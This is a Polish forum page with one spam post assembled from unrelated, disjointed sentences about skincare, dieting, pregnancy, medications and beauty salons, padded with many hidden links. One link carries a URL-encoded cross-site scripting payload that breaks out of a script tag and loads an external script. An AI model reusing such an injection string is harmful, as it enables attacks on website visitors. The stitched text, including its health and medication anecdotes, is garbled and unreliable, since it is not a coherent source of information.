Forum www.spectra.fora.pl Strona Gwna
 Forum
¤  Forum www.spectra.fora.pl Strona Gwna
¤  Zobacz posty od ostatniej wizyty
¤  Zobacz swoje posty
¤  Zobacz posty bez odpowiedzi
www.spectra.fora.pl
Forum sojuszw Spectra i Akademia Spectra
 FAQFAQ   SzukajSzukaj   UytkownicyUytkownicy   GrupyGrupy   GalerieGalerie  RejestracjaRejestracja 
 ProfilProfil   Zaloguj si, by sprawdzi wiadomociZaloguj si, by sprawdzi wiadomoci   ZalogujZaloguj 
 
Generalnie jeśli ktoś nie ma problemów z cerą i ma nadmi

Napisz nowy temat   Odpowiedz do tematu    Forum www.spectra.fora.pl Strona Gwna -> Akademia Spectra Zobacz poprzedni temat :: Zobacz nastpny temat  
Generalnie jeśli ktoś nie ma problemów z cerą i ma nadmi
Autor Wiadomo
Juukla




Doczy: 25 Sty 2014
Posty: 693
Przeczyta: 0 tematw

Ostrzee: 0/5
Skd: Finland

PostWysany: Pi 0:08, 11 Kwi 2014    Temat postu: Generalnie jeśli ktoś nie ma problemów z cerą i ma nadmi
 
wzrost 176.
[link widoczny dla zalogowanych]
te co napisała powyżej Przeniesienie (Just One Last Dance, Living to love you), ale też Skin On Skin, From Sarah with love...
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
Boh, jedni szukaja przez dlugie miesiace a inni znajduja ja od razu.
[link widoczny dla zalogowanych]

spróbuj olejku rycynowego. [link widoczny dla zalogowanych] Facet wiedział jak się ustawić nie ma co.
a powinni brać np. uparłaś się strasznie widzę a tu naprawdę potrzeba po prostu czasu i codziennej regularnej pielęgnacji blizny. Ja z kolei pobiegam dzis wieczorem. Zostawiam topik w dobrych rękach- mam nadzieję,ze nie padnie przez te 2 tygodnie Dziewczyny!!Ni dajcie się na to nabrać! [link widoczny dla zalogowanych]
Bo stare cwaniary co niektóre są w tej firmie po 20 lat a nie 2 miesiące i mają za soba niejedną reorganizację. Później je zniesiono. No, a tak wlasciwie, to nie wystarczy uczyc sie samego rodzajnika, ale trzeba tez od razu wkuwac liczbe mnoga, bo tu jest bardzo roznie A skurcze od 5 mca nie nastawiały mnie optymistycznie na podróże. Przy zdrowej florze nie wystapily u nikogo zadne problemy. zajela sie mna dziewczyna ktora albo ma 2lewe rece, prawdopodobnie bez dosiwadczenia, zdawalo mi sie ze jestem jej pierwsza klientka.. Konspiracja masz niezły pomysł jak na Pielgrzymkę to tylko jako opiekunka oczywiście z kijem do odpędzania małolat Bo jak bym tam wpadła jako samotna, zbłąkana owieczka, oczywiście wymagająca opieki i Pasterza -hehehe , to pewnie bym się zdziwiła, bo owieczek jak znam życie byłoby tam już kilka stad
To pasuje chłopakom, bo zawsze jakaś ciocia czy wujek się z nimi pobawią, poszaleją.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
kolejna osoba ktora wiezy w dobro snapea?

[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
Cześć dziewczyny! Joanna Zagdańska - Rękawiczki
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
Pół biedy, gdyby powiekszyła sobie o jeden numer, ale ona ma cycki niemal jak Dolly Parton i wmawia, że to po dzieciach!
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
witam, chciałabym zapytać czy ktoś robił sobie operację uszu u dr Broma?

Wyszłam naprawdę zadowolona. [link widoczny dla zalogowanych] Dziewczyny z wami to czlowiek przyspieszyc sobie moze na wesolo porod
Nawet jak sobie pomyślę, że miałabym zjeść na śniadanie normalną miseczkę musli z mlekiem i owocami, to już mi się włącza w głowie czerwone światło i myślałabym o tym do pułudnia, czy może to zbyt wiele... Będą się trzymać napewno! Mężczyźni zdecydowanie go unikają, jakby podświadomie zdawali sobie sprawę, że jest zarezerwowany dla małych dziewczynek i całą swoją delikatnością uosabia dziewczęcość, czułość, ukojenie i wszystko, co jest związane z dzieciństwem. Myje sobie i myje a tu na ścianie taki wielki czarny pająk... a jakie byłyby dobre do chodzenia na co dzień.. [link widoczny dla zalogowanych]
a faceci przed 30 sa ok kobiety po 30 czy 40 sa zadbane,wiedza czego chca,nie szukaja na sile meza i sponsora,sa dojrzale i niezalezne;sama jestem trzydziestka ,nie sadze,ze po 40 zmienie sie(moze pare zmarszczek wiecej,ale grunt to je zaakceptowac Znasz kogos kto to zazywal i moze powiedziec o skutecznosci tych tabletek? Ja tam bardzo ją lubię. ja brałam, no i powiem wam ze jak wzielam ten lek to tak mnie zaczelo swedziec, ze az sie poplakalam , juz nie wiedzuialam co mam ze soba zrobic, ale usnlam i juz nastepnego dnia bylo lepiej, wybralam 6 tabletek na 10, bo dostalam okresu, ale jak mi sie skonczyl okres no to na szczescie nie wrocilo to i mam spokoj na razie, no ale sie boje, bo sie przeziebie i moze nadal wrocic... Usunęła mi kamień nazębny, bo mi się odkłada, a nie usuwany prowadzi do paradontozy (wypadania zębów). Mieszkam we Wrocławiu, dzielnica Śródmieście, niedaleko pl. jak Ty to zrobilas?????????????????????
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
W to trzeba jednak więcej zainwestować niż w rzeczy używane
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
teraz zgodnie z zaleceniami kilka dni nie robi enic na brzusio
o ile mi wiadomo to jest specjalny płyn do ściagania tipsów, nie powinno sie tipsów odrywac samemu, bo mozna uszkodzic sobie płytkę
No wiec zgadza sie:

Co za Głupek napisał że przez masturbacje można zajść w ciążę?
[link widoczny dla zalogowanych]
Byłam w paru salonach i nikt nie chciał sie podjąc tego zadania (że mi niby włosy moga się wykruszyć, albo, że nie wyjdzie mi kolor taki co bym chciała tylko tęcza kolorów).
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Po 2-10 minutach poczujemy parcie, zabieramy książkę lub ulubiona gazetę i udajemy się na sedesik. [link widoczny dla zalogowanych] Śniadanie:
4.Początkowo okresowe a potem stełe osłabienie siły mięśniowej ręki - zwłaszcza osłabienie chwytu szczypcoweg Dziewczyny jaką polecacie herbatkę tak na początek dnia? Stabilizacja chciałam kupić te papierki do sprawdzenia ale w aptece nie mają. Szkoda, że nie zajrzałam tu wcześniej, zanim poszłam ściąć włosy do HAIR COF w Bonarce. [link widoczny dla zalogowanych]
[link widoczny dla zalogowanych] p?transaction=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74% 3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3 I ogólnie będzie Ci wygodniej i zdrowiej. Mój znajomy został juz przesłuchany i wszyscy świadkowie. kanapka z serem, Drugie śniadanie: Wysoka goraczka,wymioty i mnostwo ropy. zaczełam w lipcu 2007 cwiczyłam codziennie po godzinie (na poczatku to troszke krocej kondycja kiepska) dietka 2 tygodznie zero chlebka i oczywiscie zero slodyczy (to do dziś) potem chlebek razowy, a l karnityne sporadycznie moze 2 razy brałam, poza tym duzo owoców i warzyw i w zasadzie jem wszystko
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Chciałabym zapytać czy wyniki badań na nosicielstwo musi wpisać do książeczki lekarz medycyny pracy czy może to być zwykły lekarz rodzinny ???
[link widoczny dla zalogowanych]
Przeczytaj cały watek-tam jest duzo opisane. Sposobami ktore istnieja ktore sa skuteczne, malo kosztowne i jedyne czego wymagaja to minimum wiedzy.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
planu diety to mozna na noc jeść zupe
[link widoczny dla zalogowanych]
na drugi dzień rano, głodna, jadę do szpitala, brzuch się spinał, ale nie zwracałam na to uwagi - a ktg pokazuje skurcze w pełnej skali ci kilka minut - a mnie nic nie boli.
Piszecie, że dzieciaki się awanturują Hmmmm Moje na szczęście wczoraj tak się zajęły basenikiem, że odpuściły mi trochę Ale w piątek było i duszno i burzowo i myślałam, że mnie zamordują pretensjami
[link widoczny dla zalogowanych]

U mnie usg i biopsja potwierdziła obecność guzów,niby nie złośliwe ale...skoro tarczyca i tak nie pracuje to bezpieczniej jej się pozbyć. [link widoczny dla zalogowanych] 1 osobe na 1000.
Trochę jestem zaskoczona bo dalej biorę bromka ćwiartkę na wieczór, lekarz kazał dalej brać. Ale juz jest prawie zdrowy. Zdesperowana W Wawie jest salon, który posiada rewelacyjne kosmetyczki. ...pewne podobieństwo jest... [link widoczny dla zalogowanych]
Żeby tylko zielonowłosego nie było A czy o waszej chorobie wiedzą wasi bliscy? jest jeden kawałek ktorego szukalem juz dzisiaj cały dzień...i nie znalazłem Ale odkąd zaczełam czytać wypowiedzi na tym formum innych osób to juz do tego tak nie podchodze i w sumie jestem zdecydowana. Dziewczyny ja juz kiedys pisalam na tym forum na str 115. ad.3Nie balam sie nigdy jesc po glodowce,ale diete nalezy zweryfikowac ( zmienic). A wlasnie apropos utrzymania to za mieszkanie placilam 100,25 euro miesiecznie oplata semestralna w Zittau akurat tylko 48euro w Dreznie juz ponoc 120 ale na wakacje przez zaledwie 9tygodni zarobilam 2700euro.
Wiem ze sa rozne opinie na temat tego salonu ale ja jestem zadowolona
a tu jest adres ich strony:
[link widoczny dla zalogowanych]
Po urodzeniu córki założyłam wkładkę.
a fryzurke mam na pazia i wygladam naprawde dobrze, o wielkim babsku nie ma mowy..
Może mi się uda!!!
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]



Post zosta pochwalony 0 razy
Powrt do gry Zobacz profil autora
Wywietl posty z ostatnich:   

Napisz nowy temat   Odpowiedz do tematu    Forum www.spectra.fora.pl Strona Gwna -> Akademia Spectra Wszystkie czasy w strefie EET (Europa)
Strona 1 z 1

 
Skocz do:  
 
Moesz pisa nowe tematy
Moesz odpowiada w tematach
Nie moesz zmienia swoich postw
Nie moesz usuwa swoich postw
Nie moesz gosowa w ankietach

 
fora.pl - za wasne forum dyskusyjne za darmo

Powered by phpBB © 2004 phpBB Group
Galaxian Theme 1.0.2 by Twisted Galaxy